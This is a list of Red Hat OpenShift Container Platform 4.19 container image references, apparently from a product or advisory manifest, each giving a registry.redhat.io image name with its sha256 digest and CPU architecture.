"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
